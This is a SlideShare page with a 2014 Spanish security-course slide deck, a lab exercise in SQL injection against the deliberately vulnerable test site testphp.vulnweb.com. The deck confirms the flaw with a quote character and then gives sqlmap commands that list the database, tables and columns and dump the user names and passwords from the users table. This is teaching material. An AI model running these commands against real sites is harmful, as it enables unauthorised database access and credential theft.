SlideShare una empresa de Scribd logo

2. ataque por inyección de código sql a sitio web

Descargar como PPTX, PDF
JOSE ALFREDO RAMIREZ PRADA
JOSE ALFREDO RAMIREZ PRADA

Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.

Tecnología
1 de 9
Especialización en Seguridad Informática Ataque por inyección de código SQL a sitio Web JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014
Ataque a sitio Web http://testphp.vulnweb.com Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
Ataque a sitio Web http://testphp.vulnweb.com Se inicia el ataque en la pagina Web, por ejemplo se introduce una comilla en el campo “Search” del formulario «Browse artists", seguidamente en la direccion URL despues del signo igual se escribe una comilla sencilla (´) y observamos un mensaje de error SQL.
Identificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:sqlmap sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db Se confirma la vulnerabilidad y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 5.0.11 y el servidor Web PHP 5.3.10, el nombre de la base de datos ‘ACUART'. Ataque a sitio Web http://testphp.vulnweb.com
Ataque a sitio Web http://testphp.vulnweb.com Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
Ataque a sitio Web http://testphp.vulnweb.com una vez identificada la tabla (users) podremos identificar información de las columnas, correspondientemente con los siguientes comandos: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
Ataque a sitio Web http://testphp.vulnweb.com una vez identificadas las columnas de la tabla procedemos a verificar la información de los campos “uname, pass, name” de la tabla users, sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump
Ataque a sitio Web http://testphp.vulnweb.com De esta forma obtenemos toda la información de la base de datos del sitio Web.
Especialización en Seguridad Informática

Recomendados

Course 102: Lecture 16: Process Management (Part 2)
Course 102: Lecture 16: Process Management (Part 2) Course 102: Lecture 16: Process Management (Part 2)
Course 102: Lecture 16: Process Management (Part 2) Ahmed El-Arabawy
 
Course 102: Lecture 28: Virtual FileSystems
Course 102: Lecture 28: Virtual FileSystems Course 102: Lecture 28: Virtual FileSystems
Course 102: Lecture 28: Virtual FileSystems Ahmed El-Arabawy
 
An Introduction to Windows PowerShell
An Introduction to Windows PowerShellAn Introduction to Windows PowerShell
An Introduction to Windows PowerShellDale Lane
 
Linux crontab
Linux crontabLinux crontab
Linux crontabTeja Bheemanapally
 
Sql ejercicios resueltos
Sql ejercicios resueltosSql ejercicios resueltos
Sql ejercicios resueltosJhon Jairo Pertuz Arenilla
 
Shell scripting
Shell scriptingShell scripting
Shell scriptingManav Prasad
 
Linux fundamental - Chap 15 Job Scheduling
Linux fundamental - Chap 15 Job SchedulingLinux fundamental - Chap 15 Job Scheduling
Linux fundamental - Chap 15 Job SchedulingKenny (netman)
 
Sql connection
Sql connectionSql connection
Sql connectionJairo Quiroz Cabanillas
 

Recomendados

Course 102: Lecture 16: Process Management (Part 2)
Course 102: Lecture 16: Process Management (Part 2) Course 102: Lecture 16: Process Management (Part 2)
Course 102: Lecture 16: Process Management (Part 2) Ahmed El-Arabawy
 
Course 102: Lecture 28: Virtual FileSystems
Course 102: Lecture 28: Virtual FileSystems Course 102: Lecture 28: Virtual FileSystems
Course 102: Lecture 28: Virtual FileSystems Ahmed El-Arabawy
 
An Introduction to Windows PowerShell
An Introduction to Windows PowerShellAn Introduction to Windows PowerShell
An Introduction to Windows PowerShellDale Lane
 
Linux crontab
Linux crontabLinux crontab
Linux crontabTeja Bheemanapally
 
Sql ejercicios resueltos
Sql ejercicios resueltosSql ejercicios resueltos
Sql ejercicios resueltosJhon Jairo Pertuz Arenilla
 
Shell scripting
Shell scriptingShell scripting
Shell scriptingManav Prasad
 
Linux fundamental - Chap 15 Job Scheduling
Linux fundamental - Chap 15 Job SchedulingLinux fundamental - Chap 15 Job Scheduling
Linux fundamental - Chap 15 Job SchedulingKenny (netman)
 
Sql connection
Sql connectionSql connection
Sql connectionJairo Quiroz Cabanillas
 
Course 102: Lecture 14: Users and Permissions
Course 102: Lecture 14: Users and PermissionsCourse 102: Lecture 14: Users and Permissions
Course 102: Lecture 14: Users and PermissionsAhmed El-Arabawy
 
Change Windows registry using Powershell
Change Windows registry using PowershellChange Windows registry using Powershell
Change Windows registry using PowershellAman Dhally
 
50 most frequently used unix linux commands (with examples)
50 most frequently used unix linux commands (with examples)50 most frequently used unix linux commands (with examples)
50 most frequently used unix linux commands (with examples)Rodrigo Maia
 
Course 102: Lecture 8: Composite Commands
Course 102: Lecture 8: Composite Commands Course 102: Lecture 8: Composite Commands
Course 102: Lecture 8: Composite Commands Ahmed El-Arabawy
 
Breve resumen sobre consultas básicas en MySQL
Breve resumen sobre consultas básicas en MySQLBreve resumen sobre consultas básicas en MySQL
Breve resumen sobre consultas básicas en MySQLTotus Muertos
 
POUG2022_OracleDbNestInsideOut.pptx
POUG2022_OracleDbNestInsideOut.pptxPOUG2022_OracleDbNestInsideOut.pptx
POUG2022_OracleDbNestInsideOut.pptxMahmoud Hatem
 
Course 102: Lecture 9: Input Output Internals
Course 102: Lecture 9: Input Output Internals Course 102: Lecture 9: Input Output Internals
Course 102: Lecture 9: Input Output Internals Ahmed El-Arabawy
 
Vb II, Unidad 2, Manejo De Archivos
Vb II, Unidad 2, Manejo De ArchivosVb II, Unidad 2, Manejo De Archivos
Vb II, Unidad 2, Manejo De ArchivosUTP, TA
 
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...Felipe Blini
 
Shell scripting
Shell scriptingShell scripting
Shell scriptingsimha.dev.lin
 
Basic commands for powershell : Configuring Windows PowerShell and working wi...
Basic commands for powershell : Configuring Windows PowerShell and working wi...Basic commands for powershell : Configuring Windows PowerShell and working wi...
Basic commands for powershell : Configuring Windows PowerShell and working wi...Hitesh Mohapatra
 
Course 101: Lecture 5: Linux & GNU
Course 101: Lecture 5: Linux & GNU Course 101: Lecture 5: Linux & GNU
Course 101: Lecture 5: Linux & GNU Ahmed El-Arabawy
 
Introduction to sql
Introduction to sqlIntroduction to sql
Introduction to sqlVARSHAKUMARI49
 
Sql server T-sql basics ppt-3
Sql server T-sql basics ppt-3Sql server T-sql basics ppt-3
Sql server T-sql basics ppt-3Vibrant Technologies & Computers
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Complete Guide for Linux shell programming
Complete Guide for Linux shell programmingComplete Guide for Linux shell programming
Complete Guide for Linux shell programmingsudhir singh yadav
 
SQL
SQLSQL
SQLShyam Khant
 
Estructura de directorio de ubuntu
Estructura de directorio de ubuntuEstructura de directorio de ubuntu
Estructura de directorio de ubuntulissethdiazvillalobos
 
MySql:Introduction
MySql:IntroductionMySql:Introduction
MySql:IntroductionDataminingTools Inc
 
SQL - RDBMS Concepts
SQL - RDBMS ConceptsSQL - RDBMS Concepts
SQL - RDBMS ConceptsWebStackAcademy
 
Apuntes php
Apuntes phpApuntes php
Apuntes phpEduardo Rafael Petla
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql webkateqr
 

Más contenido relacionado

La actualidad más candente

Course 102: Lecture 14: Users and Permissions
Course 102: Lecture 14: Users and PermissionsCourse 102: Lecture 14: Users and Permissions
Course 102: Lecture 14: Users and PermissionsAhmed El-Arabawy
 
Change Windows registry using Powershell
Change Windows registry using PowershellChange Windows registry using Powershell
Change Windows registry using PowershellAman Dhally
 
50 most frequently used unix linux commands (with examples)
50 most frequently used unix linux commands (with examples)50 most frequently used unix linux commands (with examples)
50 most frequently used unix linux commands (with examples)Rodrigo Maia
 
Course 102: Lecture 8: Composite Commands
Course 102: Lecture 8: Composite Commands Course 102: Lecture 8: Composite Commands
Course 102: Lecture 8: Composite Commands Ahmed El-Arabawy
 
Breve resumen sobre consultas básicas en MySQL
Breve resumen sobre consultas básicas en MySQLBreve resumen sobre consultas básicas en MySQL
Breve resumen sobre consultas básicas en MySQLTotus Muertos
 
POUG2022_OracleDbNestInsideOut.pptx
POUG2022_OracleDbNestInsideOut.pptxPOUG2022_OracleDbNestInsideOut.pptx
POUG2022_OracleDbNestInsideOut.pptxMahmoud Hatem
 
Course 102: Lecture 9: Input Output Internals
Course 102: Lecture 9: Input Output Internals Course 102: Lecture 9: Input Output Internals
Course 102: Lecture 9: Input Output Internals Ahmed El-Arabawy
 
Vb II, Unidad 2, Manejo De Archivos
Vb II, Unidad 2, Manejo De ArchivosVb II, Unidad 2, Manejo De Archivos
Vb II, Unidad 2, Manejo De ArchivosUTP, TA
 
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...Felipe Blini
 
Basic commands for powershell : Configuring Windows PowerShell and working wi...
Basic commands for powershell : Configuring Windows PowerShell and working wi...Basic commands for powershell : Configuring Windows PowerShell and working wi...
Basic commands for powershell : Configuring Windows PowerShell and working wi...Hitesh Mohapatra
 
Course 101: Lecture 5: Linux & GNU
Course 101: Lecture 5: Linux & GNU Course 101: Lecture 5: Linux & GNU
Course 101: Lecture 5: Linux & GNU Ahmed El-Arabawy
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
Complete Guide for Linux shell programming
Complete Guide for Linux shell programmingComplete Guide for Linux shell programming
Complete Guide for Linux shell programmingsudhir singh yadav
 

La actualidad más candente (20)

Course 102: Lecture 14: Users and Permissions
Course 102: Lecture 14: Users and PermissionsCourse 102: Lecture 14: Users and Permissions
Course 102: Lecture 14: Users and Permissions
 
Change Windows registry using Powershell
Change Windows registry using PowershellChange Windows registry using Powershell
Change Windows registry using Powershell
 
50 most frequently used unix linux commands (with examples)
50 most frequently used unix linux commands (with examples)50 most frequently used unix linux commands (with examples)
50 most frequently used unix linux commands (with examples)
 
Course 102: Lecture 8: Composite Commands
Course 102: Lecture 8: Composite Commands Course 102: Lecture 8: Composite Commands
Course 102: Lecture 8: Composite Commands
 
Breve resumen sobre consultas básicas en MySQL
Breve resumen sobre consultas básicas en MySQLBreve resumen sobre consultas básicas en MySQL
Breve resumen sobre consultas básicas en MySQL
 
POUG2022_OracleDbNestInsideOut.pptx
POUG2022_OracleDbNestInsideOut.pptxPOUG2022_OracleDbNestInsideOut.pptx
POUG2022_OracleDbNestInsideOut.pptx
 
Course 102: Lecture 9: Input Output Internals
Course 102: Lecture 9: Input Output Internals Course 102: Lecture 9: Input Output Internals
Course 102: Lecture 9: Input Output Internals
 
Vb II, Unidad 2, Manejo De Archivos
Vb II, Unidad 2, Manejo De ArchivosVb II, Unidad 2, Manejo De Archivos
Vb II, Unidad 2, Manejo De Archivos
 
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
Monitoramento de serviços com Zabbix + Grafana + Python - Marcelo Santoto - D...
 
Shell scripting
Shell scriptingShell scripting
Shell scripting
 
Basic commands for powershell : Configuring Windows PowerShell and working wi...
Basic commands for powershell : Configuring Windows PowerShell and working wi...Basic commands for powershell : Configuring Windows PowerShell and working wi...
Basic commands for powershell : Configuring Windows PowerShell and working wi...
 
Course 101: Lecture 5: Linux & GNU
Course 101: Lecture 5: Linux & GNU Course 101: Lecture 5: Linux & GNU
Course 101: Lecture 5: Linux & GNU
 
Introduction to sql
Introduction to sqlIntroduction to sql
Introduction to sql
 
Sql server T-sql basics ppt-3
Sql server T-sql basics ppt-3Sql server T-sql basics ppt-3
Sql server T-sql basics ppt-3
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
Complete Guide for Linux shell programming
Complete Guide for Linux shell programmingComplete Guide for Linux shell programming
Complete Guide for Linux shell programming
 
SQL
SQLSQL
SQL
 
Estructura de directorio de ubuntu
Estructura de directorio de ubuntuEstructura de directorio de ubuntu
Estructura de directorio de ubuntu
 
MySql:Introduction
MySql:IntroductionMySql:Introduction
MySql:Introduction
 
SQL - RDBMS Concepts
SQL - RDBMS ConceptsSQL - RDBMS Concepts
SQL - RDBMS Concepts
 

Destacado

Ataque sql web
Ataque sql webAtaque sql web
Ataque sql webkateqr
 
Relacionar tablas de bases de datos
Relacionar tablas de bases de datosRelacionar tablas de bases de datos
Relacionar tablas de bases de datosBLABLABLA59
 
Como relacionar tablas de una base de datos
Como relacionar tablas de una base de datosComo relacionar tablas de una base de datos
Como relacionar tablas de una base de datoslenin_tandalia
 
Tablas, Codigos De Base De Datos
Tablas, Codigos De Base De DatosTablas, Codigos De Base De Datos
Tablas, Codigos De Base De Datosguesta050b04
 
Creación de tablas y relaciones en MySQL y wamp server
Creación de tablas y relaciones en MySQL y wamp serverCreación de tablas y relaciones en MySQL y wamp server
Creación de tablas y relaciones en MySQL y wamp serverJair Ospino Ardila
 
Codigo para crear la base de datos
Codigo para crear la base de datosCodigo para crear la base de datos
Codigo para crear la base de datosAlvaro Cardona
 

Destacado (8)

Apuntes php
Apuntes phpApuntes php
Apuntes php
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql web
 
Php
PhpPhp
Php
 
Relacionar tablas de bases de datos
Relacionar tablas de bases de datosRelacionar tablas de bases de datos
Relacionar tablas de bases de datos
 
Como relacionar tablas de una base de datos
Como relacionar tablas de una base de datosComo relacionar tablas de una base de datos
Como relacionar tablas de una base de datos
 
Tablas, Codigos De Base De Datos
Tablas, Codigos De Base De DatosTablas, Codigos De Base De Datos
Tablas, Codigos De Base De Datos
 
Creación de tablas y relaciones en MySQL y wamp server
Creación de tablas y relaciones en MySQL y wamp serverCreación de tablas y relaciones en MySQL y wamp server
Creación de tablas y relaciones en MySQL y wamp server
 
Codigo para crear la base de datos
Codigo para crear la base de datosCodigo para crear la base de datos
Codigo para crear la base de datos
 

Similar a 2. ataque por inyección de código sql a sitio web

Presentacion practica seguridad bd
Presentacion practica seguridad bdPresentacion practica seguridad bd
Presentacion practica seguridad bdJaider Contreras
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosCarlos Otero
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webDaycith Gonzalez
 
curso-servidores-apache-2
curso-servidores-apache-2curso-servidores-apache-2
curso-servidores-apache-2greenpeans
 
Crear base de datos mysql command
Crear base de datos mysql commandCrear base de datos mysql command
Crear base de datos mysql commandLouis Jhosimar
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
 
MySQL. Tutorial Básico
MySQL. Tutorial BásicoMySQL. Tutorial Básico
MySQL. Tutorial BásicoJosu Orbe
 

Similar a 2. ataque por inyección de código sql a sitio web (20)

Presentación ataque 1 sql
Presentación ataque 1 sqlPresentación ataque 1 sql
Presentación ataque 1 sql
 
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 
Presentacion practica seguridad bd
Presentacion practica seguridad bdPresentacion practica seguridad bd
Presentacion practica seguridad bd
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datos
 
Inyeccion sql by Anonymous - Americalatina
Inyeccion sql by Anonymous - AmericalatinaInyeccion sql by Anonymous - Americalatina
Inyeccion sql by Anonymous - Americalatina
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Articulo ieee ataque_i
Articulo ieee ataque_iArticulo ieee ataque_i
Articulo ieee ataque_i
 
curso-servidores-apache-2
curso-servidores-apache-2curso-servidores-apache-2
curso-servidores-apache-2
 
Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
Crear base de datos mysql command
Crear base de datos mysql commandCrear base de datos mysql command
Crear base de datos mysql command
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Mysql
MysqlMysql
Mysql
 
Ataque por inyección de código sql
Ataque por inyección de código sqlAtaque por inyección de código sql
Ataque por inyección de código sql
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
 
08. java con my sql
08. java con my sql08. java con my sql
08. java con my sql
 
MySQL. Tutorial Básico
MySQL. Tutorial BásicoMySQL. Tutorial Básico
MySQL. Tutorial Básico
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
Team.docx
Team.docxTeam.docx
Team.docx
 
Curso my sql
Curso my sqlCurso my sql
Curso my sql
 

Último

Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...Luis Olivera
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...JaquelineJuarez15
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofJuancarlosHuertasNio1
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 

Último (20)

Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
Clase N°4 - Purificación y secuenciación de acidos nucleicos Benoit Diringer ...
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sof
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 

2. ataque por inyección de código sql a sitio web

  • 1. Especialización en Seguridad Informática Ataque por inyección de código SQL a sitio Web JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014
  • 2. Ataque a sitio Web http://testphp.vulnweb.com Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
  • 3. Ataque a sitio Web http://testphp.vulnweb.com Se inicia el ataque en la pagina Web, por ejemplo se introduce una comilla en el campo “Search” del formulario «Browse artists", seguidamente en la direccion URL despues del signo igual se escribe una comilla sencilla (´) y observamos un mensaje de error SQL.
  • 4. Identificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:sqlmap sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db Se confirma la vulnerabilidad y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 5.0.11 y el servidor Web PHP 5.3.10, el nombre de la base de datos ‘ACUART'. Ataque a sitio Web http://testphp.vulnweb.com
  • 5. Ataque a sitio Web http://testphp.vulnweb.com Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
  • 6. Ataque a sitio Web http://testphp.vulnweb.com una vez identificada la tabla (users) podremos identificar información de las columnas, correspondientemente con los siguientes comandos: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
  • 7. Ataque a sitio Web http://testphp.vulnweb.com una vez identificadas las columnas de la tabla procedemos a verificar la información de los campos “uname, pass, name” de la tabla users, sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump
  • 8. Ataque a sitio Web http://testphp.vulnweb.com De esta forma obtenemos toda la información de la base de datos del sitio Web.